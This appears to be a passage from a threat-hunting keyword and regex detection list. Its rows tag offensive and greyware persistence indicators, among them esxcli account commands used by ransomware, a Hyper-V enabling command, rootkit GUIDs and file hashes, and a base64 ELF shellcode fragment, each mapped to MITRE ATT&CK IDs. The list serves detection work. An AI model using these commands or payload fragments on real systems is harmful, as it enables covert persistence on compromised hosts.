1102*Enable-WindowsOptionalFeature -Online:$true -FeatureName Microsoft-Hyper-V -All:$true*.{0,1000}Enable\-WindowsOptionalFeature\s\-Online\:\$true\s\-FeatureName\sMicrosoft\-Hyper\-V\s\-All\:\$true.{0,1000}greyware_tool_keywordpowershellenabling hyperV - virtualization could be abused by attacker to maintain persistence in a virtual machineT1560.003 - T1547 - T1059TA0003 - TA0002N/ARagnarLocker Persistencehttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/10N/AN/A77N/AN/AN/AN/A43135
1103*Enumerating Administrators group, please wait*.{0,1000}Enumerating\sAdministrators\sgroup,\splease\swait.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z43216
1104*Enumerating new user, please wait*.{0,1000}Enumerating\snew\suser,\splease\swait.{0,1000}offensive_tool_keyworddoucmeleverages the NetUserAdd Win32 API to create a new computer accountT1136 - T1098 - T1078TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Ben0xA/DoUCMe10N/AN/A9169182021-05-01T03:15:59Z2021-04-29T15:41:28Z43217
1105*esxcli system account add*.{0,1000}esxcli\ssystem\saccount\sadd.{0,1000}greyware_tool_keywordesxclicommands used by ransomware targeting ESXi hostsT1098 - T1078 - T1078.003TA0003 - TA0004N/ABlack BastaPersistencehttps://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce782310N/AN/A89N/AN/AN/AN/A43254
1106*esxcli system account set -i * -s t*.{0,1000}esxcli\ssystem\saccount\sset\s\-i\s.{0,1000}\s\-s\st.{0,1000}greyware_tool_keywordesxclicommands used by ransomware targeting ESXi hostsT1098 - T1078 - T1078.003TA0003 - TA0004N/ABlack BastaPersistencehttps://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce782310N/AN/A89N/AN/AN/AN/A43256
1107*exec dropbear *.{0,1000}exec\sdropbear\s.{0,1000}greyware_tool_keyworddropbearA smallish SSH server and clientT1021.004 - T1570TA0003N/ACOZY BEARPersistencehttps://github.com/mkj/dropbear10N/AN/A81018514112025-03-16T12:50:35Z2013-03-19T11:15:36Z43441
1108*ExecStartPre present! ExecStartPre was modified!*.{0,1000}ExecStartPre\spresent!\sExecStartPre\swas\smodified!.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z43456
1109*F0005D08-6278-4BFE-B492-F86CCEC797D5*.{0,1000}F0005D08\-6278\-4BFE\-B492\-F86CCEC797D5.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10#GUIDprojectN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z43672
1110*f0c4face818f1c021228c140e453fc43b214141ed0273bce57be44cae6461bb2*.{0,1000}f0c4face818f1c021228c140e453fc43b214141ed0273bce57be44cae6461bb2.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z43717
1111*f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88*.{0,1000}f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine10#filehash #linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z43727
1112*f0fc4517a1a74f1922e41886cc4584c7683f7726111e40f03b26edc6bd9c6642*.{0,1000}f0fc4517a1a74f1922e41886cc4584c7683f7726111e40f03b26edc6bd9c6642.{0,1000}offensive_tool_keywordCDKCDK is an open-sourced container penetration toolkitT1610 - T1611 - T1203 - T1059.004 - T1564.004TA0001 - TA0002 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/cdk-team/CDK10#linux #filehashN/A91041645662025-03-08T14:00:06Z2020-11-05T09:18:51Z43732
1113*f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5*.{0,1000}f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#base64 #linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z43733
The file is too large to be shown. View Raw